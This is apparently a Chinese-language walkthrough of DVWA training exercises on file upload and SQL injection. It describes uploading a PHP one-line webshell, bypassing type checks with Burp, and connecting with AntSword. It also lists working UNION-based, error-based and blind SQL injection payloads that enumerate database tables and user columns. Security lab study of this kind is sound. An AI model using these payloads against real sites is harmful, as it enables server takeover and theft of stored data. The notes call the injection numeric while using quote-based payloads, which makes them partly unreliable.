file upload(文件上传)
low
文件上传漏洞,通常是由于对上传文件的类型,内容没有进行严格的过滤,检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的,Apache,Tomcat,Nginx等都是爆过文件上传漏洞。
查看源码发现对文件类型内容没有任何限制检查存在文件上传漏洞。
制作一句话木马,文件格式为php上传文件。使用蚁剑连接。进入后台。
Mdeium
查看源码发现对文件类型限制应该为jepg或者为png
编辑一句话木马为jpg格式上传,使用burp抓包将文件格式更改为php格式,成功后再用蚁剑连接
high
查看源码
发现需要上传图片木马
SQL injection(sql注入)
low
1、判断注入类型
输入1成功,输入1 and1=1 成功 输入1’失败
判断为数字型注入
2、猜测sql查询语句的字段数
输入1’ order by 2#成功 输入1’ order by 3#失败,判断出字段数为2
3、获取用户,数据库,版本号
输入1' union select 1,concat(user(),database(),version())#
4,获取数据库中的表
1' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa' #
medium
1.提交后burp抓包,修改id=1改为1 and 1=2 union select 1,concat(database(),floor(rand(0)*2))x from information_schema.tables group by x #
在响应包查看
重复上面步骤
2.爆破表的数量: id=1 改为1 and 1=2 union select 1,concat((select count(table_name) from information_schema.tables where table_schema=database()),floor(rand(0)*2))x from information_schema.tables group by x#
3.爆破表的名字: id=1改为 1 and 1=2 union select 1,concat((select group_concat(table_name) from information_schema.tables where table_schema=database()),floor(rand(0)*2))x from information_schema.tables group by x#
4.爆破users的字段名
id=1改为1 and 1=2 union select 1,concat((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273 ),floor(rand(0)*2))x from information_schema.tables group by x#
high
查看源码
使用了session 获取id 值,闭合方式单引号闭合
SQL injection(sql注入盲注)
判断注入类型和sql注入一样
判断数据库的长度
输入1’ and length(database())=1 #,显示不存在;
输入1’ and length(database())=2 #,显示不存在;
输入1’ and length(database())=3 #,显示不存在;
输入1’ and length(database())=4 #,显示存在: